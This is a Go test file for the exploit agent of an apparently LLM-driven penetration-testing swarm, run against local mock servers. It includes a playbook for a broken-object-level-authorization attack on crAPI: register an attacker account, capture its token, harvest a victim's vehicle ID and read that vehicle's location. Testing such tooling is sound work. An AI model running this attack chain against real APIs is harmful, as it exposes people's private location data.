package agents

import (
	"context"
	"encoding/json"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync/atomic"
	"testing"
	"time"

	exploitpkg "github.com/Armur-Ai/Pentest-Swarm-AI/internal/agent/exploit"
	"github.com/Armur-Ai/Pentest-Swarm-AI/internal/llm"
	"github.com/Armur-Ai/Pentest-Swarm-AI/internal/pipeline"
	"github.com/Armur-Ai/Pentest-Swarm-AI/internal/scope"
	"github.com/Armur-Ai/Pentest-Swarm-AI/internal/swarm/blackboard"
	"github.com/google/uuid"
)

func TestIsAPIEndpoint(t *testing.T) {
	cases := []struct {
		ep   pipeline.EndpointRecord
		want bool
	}{
		{pipeline.EndpointRecord{URL: "http://t/identity/api/v2/user/dashboard"}, true},
		{pipeline.EndpointRecord{URL: "http://t/rest/basket/1"}, true},
		{pipeline.EndpointRecord{URL: "http://t/profile", Method: "POST"}, true},
		{pipeline.EndpointRecord{URL: "http://t/anything", Interesting: true}, true},
		{pipeline.EndpointRecord{URL: "http://t/static/main.js"}, false},
		{pipeline.EndpointRecord{URL: "http://t/assets/logo.png", Method: "GET"}, false},
		{pipeline.EndpointRecord{URL: "http://t/home"}, false},
		{pipeline.EndpointRecord{URL: ""}, false},
		// a static asset is noise even if the crawler flagged it interesting
		{pipeline.EndpointRecord{URL: "http://t/app/bundle.js", Interesting: true}, false},
	}
	for _, c := range cases {
		if got := isAPIEndpoint(c.ep); got != c.want {
			t.Errorf("isAPIEndpoint(%q, m=%q, int=%v) = %v, want %v", c.ep.URL, c.ep.Method, c.ep.Interesting, got, c.want)
		}
	}
}

func TestIsAuthEndpoint(t *testing.T) {
	for _, u := range []string{"http://t/identity/api/auth/login", "http://t/api/token/refresh", "http://t/signup"} {
		if !isAuthEndpoint(u) {
			t.Errorf("expected %q to be an auth endpoint", u)
		}
	}
	if isAuthEndpoint("http://t/api/v2/vehicle/1") {
		t.Error("vehicle endpoint should not be classed as auth")
	}
}

func TestNormalizeEndpoint_CollapsesIDs(t *testing.T) {
	a := normalizeEndpoint("GET", "http://t/api/v2/vehicle/42/location?x=1")
	b := normalizeEndpoint("get", "http://t/api/v2/vehicle/43/location?x=9")
	if a != b {
		t.Fatalf("numeric ids should collapse: %q vs %q", a, b)
	}
	// A different resource must NOT collapse into the same key.
	if c := normalizeEndpoint("GET", "http://t/api/v2/mechanic/42"); c == a {
		t.Fatalf("distinct resources collapsed: %q", c)
	}
	// uuid-like segments collapse too.
	u1 := normalizeEndpoint("GET", "http://t/api/order/3fa85f64-5717-4562-b3fc-2c963f66afa6")
	u2 := normalizeEndpoint("GET", "http://t/api/order/00000000-0000-0000-0000-000000000000")
	if u1 != u2 {
		t.Fatalf("uuid ids should collapse: %q vs %q", u1, u2)
	}
}

// fakeProvider counts Complete calls and returns a single-step attack plan so
// BuildPlan yields a non-empty path.
type fakeProvider struct{ calls int64 }

func (f *fakeProvider) Complete(ctx context.Context, req llm.CompletionRequest) (*llm.CompletionResponse, error) {
	atomic.AddInt64(&f.calls, 1)
	return &llm.CompletionResponse{
		Content: `[{"name":"api","description":"d","steps":[{"name":"probe","command":"httpreq --url http://127.0.0.1/x"}],"estimated_success_probability":0.5,"expected_impact":"medium"}]`,
	}, nil
}
func (f *fakeProvider) Stream(context.Context, llm.CompletionRequest) (<-chan llm.StreamChunk, error) {
	return nil, nil
}
func (f *fakeProvider) HealthCheck(context.Context) error { return nil }
func (f *fakeProvider) ModelName() string                 { return "fake" }
func (f *fakeProvider) ContextWindow() int                { return 200000 }
func (f *fakeProvider) SupportsToolUse() bool             { return false }

func endpointFinding(campaignID uuid.UUID, urlStr string) blackboard.Finding {
	data, _ := json.Marshal(pipeline.EndpointRecord{URL: urlStr, Method: "GET"})
	return blackboard.Finding{
		CampaignID: campaignID,
		Type:       blackboard.TypeHTTPEndpoint,
		Target:     urlStr,
		Data:       data,
	}
}

// The cost controls: duplicate endpoints (same resource, different id) build
// only one plan, and the per-campaign cap bounds distinct API targets.
func TestHandleAPIEndpoint_DedupAndCap(t *testing.T) {
	campaignID := uuid.New()
	prov := &fakeProvider{}
	inner := exploitpkg.NewExploitAgent(prov)
	board := blackboard.NewMemoryBoard(time.Now)

	agent := NewExploitAgent(inner, nil, "find all vulns", campaignID, 1, true /*dryRun*/, nil)
	agent.maxAPITargets = 2

	ctx := context.Background()
	urls := []string{
		"http://t/api/v2/vehicle/1/location", // target A
		"http://t/api/v2/vehicle/2/location", // dup of A (numeric id)
		"http://t/api/v2/vehicle/3/location", // dup of A
		"http://t/api/v2/mechanic/9",         // target B
		"http://t/api/v2/order/7",            // target C — over the cap of 2
		"http://t/static/app.js",             // not an API endpoint
	}
	for _, u := range urls {
		if err := agent.Handle(ctx, endpointFinding(campaignID, u), board); err != nil {
			t.Fatalf("Handle(%q): %v", u, err)
		}
	}

	// Distinct API targets = A, B, C but cap=2, so only 2 plans are built.
	if got := atomic.LoadInt64(&prov.calls); got != 2 {
		t.Fatalf("plan builds = %d, want 2 (dedup + cap)", got)
	}
}

// crapiMock stands in for a live crAPI: it implements exactly the four steps of
// the BOLA playbook, and — crucially — the vehicle-location read succeeds for
// ANY authenticated caller (the access-control flaw), so a token minted by the
// throwaway attacker account reads the "victim" vehicle.
func crapiMock() *httptest.Server {
	mux := http.NewServeMux()
	mux.HandleFunc("/identity/api/auth/signup", func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusOK)
	})
	mux.HandleFunc("/identity/api/auth/login", func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", "application/json")
		_, _ = w.Write([]byte(`{"token":"jwt-xyz"}`))
	})
	mux.HandleFunc("/community/api/v2/community/posts/recent", func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Authorization") != "Bearer jwt-xyz" {
			w.WriteHeader(http.StatusUnauthorized)
			return
		}
		w.Header().Set("Content-Type", "application/json")
		_, _ = w.Write([]byte(`{"posts":[{"author":{"email":"victim@example.com","vehicleid":"VIC-1"}}]}`))
	})
	mux.HandleFunc("/identity/api/v2/vehicle/VIC-1/location", func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Authorization") != "Bearer jwt-xyz" {
			w.WriteHeader(http.StatusUnauthorized)
			return
		}
		w.WriteHeader(http.StatusOK)
		_, _ = w.Write([]byte(`{"latitude":"32.77","longitude":"-91.91","email":"victim@example.com"}`))
	})
	return httptest.NewServer(mux)
}

// bolaPlaybook mirrors recon.crapiChains against a given base URL.
func bolaPlaybook(base string) pipeline.AttackPath {
	return pipeline.AttackPath{
		ID:             uuid.New(),
		Name:           "crAPI BOLA: cross-user vehicle-location disclosure",
		Description:    "cross-user location read",
		ExpectedImpact: "high",
		Steps: []pipeline.AttackStep{
			{ID: uuid.New(), Name: "signup", Command: "httpreq --method POST --url " + base + `/identity/api/auth/signup --body '{"email":"atk_{{nonce}}@example.com"}'`},
			{ID: uuid.New(), Name: "login", Command: "httpreq --method POST --url " + base + `/identity/api/auth/login --body '{"email":"atk_{{nonce}}@example.com","password":"x"}' --capture jwt=$.token`, ExpectedOutputPattern: "HTTP 200"},
			{ID: uuid.New(), Name: "harvest", Command: "httpreq --url " + base + "/community/api/v2/community/posts/recent --header 'Authorization: Bearer {{jwt}}' --capture victim_vehicle=$.posts.0.author.vehicleid", ExpectedOutputPattern: "vehicleid"},
			{ID: uuid.New(), Name: "bola", Command: "httpreq --url " + base + "/identity/api/v2/vehicle/{{victim_vehicle}}/location --header 'Authorization: Bearer {{jwt}}'", ExpectedOutputPattern: "HTTP 200"},
		},
	}
}

func TestHandlePlaybook_RunsChainAndPublishesFinding(t *testing.T) {
	srv := crapiMock()
	defer srv.Close()

	campaignID := uuid.New()
	board := blackboard.NewMemoryBoard(time.Now)
	exec := exploitpkg.NewExecutor(&scope.ScopeDefinition{AllowedCIDRs: []string{"127.0.0.1/32"}}, nil, false)
	agent := NewExploitAgent(exploitpkg.NewExploitAgent(&fakeProvider{}), exec, "find all vulns", campaignID, 1, false, nil)

	data, _ := json.Marshal(bolaPlaybook(srv.URL))
	f := blackboard.Finding{CampaignID: campaignID, Type: blackboard.TypeExploitPlaybook, Target: srv.URL, Data: data}
	if err := agent.Handle(context.Background(), f, board); err != nil {
		t.Fatalf("handle playbook: %v", err)
	}

	// A report-ready BOLA finding must be published (high severity misconfig).
	finds, _ := board.Query(context.Background(), blackboard.Predicate{Types: []blackboard.FindingType{blackboard.TypeMisconfig}})
	var bola *pipeline.ClassifiedFinding
	for _, m := range finds {
		var cf pipeline.ClassifiedFinding
		if json.Unmarshal(m.Data, &cf) == nil && strings.Contains(cf.Title, "BOLA") {
			bola = &cf
			break
		}
	}
	if bola == nil {
		t.Fatal("expected a BOLA ClassifiedFinding to be published after a successful chain")
	}
	if bola.Severity != pipeline.SeverityHigh {
		t.Errorf("BOLA finding severity = %q, want high", bola.Severity)
	}
	if len(bola.Evidence) == 0 || !strings.Contains(bola.Evidence[0].Content, "32.77") {
		t.Errorf("BOLA finding should carry the leaked-location response as evidence")
	}

	// The chain and its step results must also be on the board for the report.
	if chains, _ := board.Query(context.Background(), blackboard.Predicate{Types: []blackboard.FindingType{blackboard.TypeExploitChain}}); len(chains) == 0 {
		t.Error("expected the EXPLOIT_CHAIN to be published")
	}
}

func TestHandlePlaybook_NoFindingWhenChainFails(t *testing.T) {
	// A server where the BOLA read is properly authorized (403) — the chain
	// runs but the proof step fails, so NO finding should be published.
	mux := http.NewServeMux()
	mux.HandleFunc("/identity/api/auth/signup", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(200) })
	mux.HandleFunc("/identity/api/auth/login", func(w http.ResponseWriter, r *http.Request) {
		_, _ = w.Write([]byte(`{"token":"jwt-xyz"}`))
	})
	mux.HandleFunc("/community/api/v2/community/posts/recent", func(w http.ResponseWriter, r *http.Request) {
		_, _ = w.Write([]byte(`{"posts":[{"author":{"vehicleid":"VIC-1"}}]}`))
	})
	mux.HandleFunc("/identity/api/v2/vehicle/VIC-1/location", func(w http.ResponseWriter, r *http.Request) {
		w.WriteHeader(http.StatusForbidden) // access control WORKS — not vulnerable
	})
	srv := httptest.NewServer(mux)
	defer srv.Close()

	campaignID := uuid.New()
	board := blackboard.NewMemoryBoard(time.Now)
	exec := exploitpkg.NewExecutor(&scope.ScopeDefinition{AllowedCIDRs: []string{"127.0.0.1/32"}}, nil, false)
	agent := NewExploitAgent(exploitpkg.NewExploitAgent(&fakeProvider{}), exec, "obj", campaignID, 1, false, nil)

	data, _ := json.Marshal(bolaPlaybook(srv.URL))
	f := blackboard.Finding{CampaignID: campaignID, Type: blackboard.TypeExploitPlaybook, Target: srv.URL, Data: data}
	if err := agent.Handle(context.Background(), f, board); err != nil {
		t.Fatalf("handle: %v", err)
	}
	finds, _ := board.Query(context.Background(), blackboard.Predicate{Types: []blackboard.FindingType{blackboard.TypeMisconfig}})
	for _, m := range finds {
		var cf pipeline.ClassifiedFinding
		if json.Unmarshal(m.Data, &cf) == nil && strings.Contains(cf.Title, "BOLA") {
			t.Fatal("no BOLA finding should be published when the proof step returns 403")
		}
	}
}

// seqProvider returns a failing plan on the first call (BuildPlan) and a
// different, working plan on the second (AdaptPlan) — to exercise the bounded
// LLM-feedback retry.
type seqProvider struct {
	n    int64
	base string
}

func (p *seqProvider) Complete(ctx context.Context, req llm.CompletionRequest) (*llm.CompletionResponse, error) {
	if atomic.AddInt64(&p.n, 1) == 1 {
		return &llm.CompletionResponse{Content: `[{"name":"try","description":"d","steps":[{"name":"probe","command":"httpreq --url ` + p.base + `/fail","expected_output_pattern":"HTTP 200"}],"expected_impact":"high"}]`}, nil
	}
	return &llm.CompletionResponse{Content: `[{"name":"retry","description":"d","steps":[{"name":"probe2","command":"httpreq --url ` + p.base + `/ok","expected_output_pattern":"HTTP 200"}],"expected_impact":"high"}]`}, nil
}
func (p *seqProvider) Stream(context.Context, llm.CompletionRequest) (<-chan llm.StreamChunk, error) {
	return nil, nil
}
func (p *seqProvider) HealthCheck(context.Context) error { return nil }
func (p *seqProvider) ModelName() string                 { return "seq" }
func (p *seqProvider) ContextWindow() int                { return 200000 }
func (p *seqProvider) SupportsToolUse() bool             { return false }

func TestRunExploit_LLMFeedbackRetry(t *testing.T) {
	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.URL.Path == "/ok" {
			w.WriteHeader(http.StatusOK)
			return
		}
		w.WriteHeader(http.StatusInternalServerError) // /fail
	}))
	defer srv.Close()

	campaignID := uuid.New()
	board := blackboard.NewMemoryBoard(time.Now)
	exec := exploitpkg.NewExecutor(&scope.ScopeDefinition{AllowedCIDRs: []string{"127.0.0.1/32"}}, nil, false)
	prov := &seqProvider{base: srv.URL}
	agent := NewExploitAgent(exploitpkg.NewExploitAgent(prov), exec, "find vulns", campaignID, 1, false, nil)

	cf := pipeline.ClassifiedFinding{ID: uuid.New(), CampaignID: campaignID, Title: "x", Severity: pipeline.SeverityHigh, Target: srv.URL}
	data, _ := json.Marshal(cf)
	f := blackboard.Finding{CampaignID: campaignID, Type: blackboard.TypeMisconfig, Target: srv.URL, Data: data}
	if err := agent.Handle(context.Background(), f, board); err != nil {
		t.Fatalf("handle: %v", err)
	}

	// The failed first chain must trigger exactly one adjusted retry: two
	// EXPLOIT_CHAINs published, and a successful result from the retry.
	chains, _ := board.Query(context.Background(), blackboard.Predicate{Types: []blackboard.FindingType{blackboard.TypeExploitChain}})
	if len(chains) != 2 {
		t.Fatalf("expected original + one retry chain (2), got %d", len(chains))
	}
	results, _ := board.Query(context.Background(), blackboard.Predicate{Types: []blackboard.FindingType{blackboard.TypeExploitResult}})
	var sawSuccess bool
	for _, m := range results {
		var wrapped struct {
			Result pipeline.ExecutionResult `json:"result"`
		}
		if json.Unmarshal(m.Data, &wrapped) == nil && wrapped.Result.Success {
			sawSuccess = true
		}
	}
	if !sawSuccess {
		t.Error("expected the adjusted retry to produce a successful step")
	}
	if n := atomic.LoadInt64(&prov.n); n != 2 {
		t.Errorf("expected exactly 2 LLM calls (build + one adapt), got %d", n)
	}
}
